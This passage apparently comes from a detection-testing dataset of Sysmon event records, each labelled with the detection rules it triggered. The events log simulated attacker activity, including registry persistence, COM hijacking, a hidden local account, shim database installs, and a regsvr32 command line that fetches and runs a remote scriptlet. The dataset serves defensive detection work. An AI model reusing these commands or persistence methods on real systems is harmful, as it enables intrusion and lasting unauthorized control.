GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution_attributes":{"ProcessID":1744,"ThreadID":2120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution_attributes":{"ProcessID":3552,"ThreadID":5004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution_attributes":{"ProcessID":276,"ThreadID":1000},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility 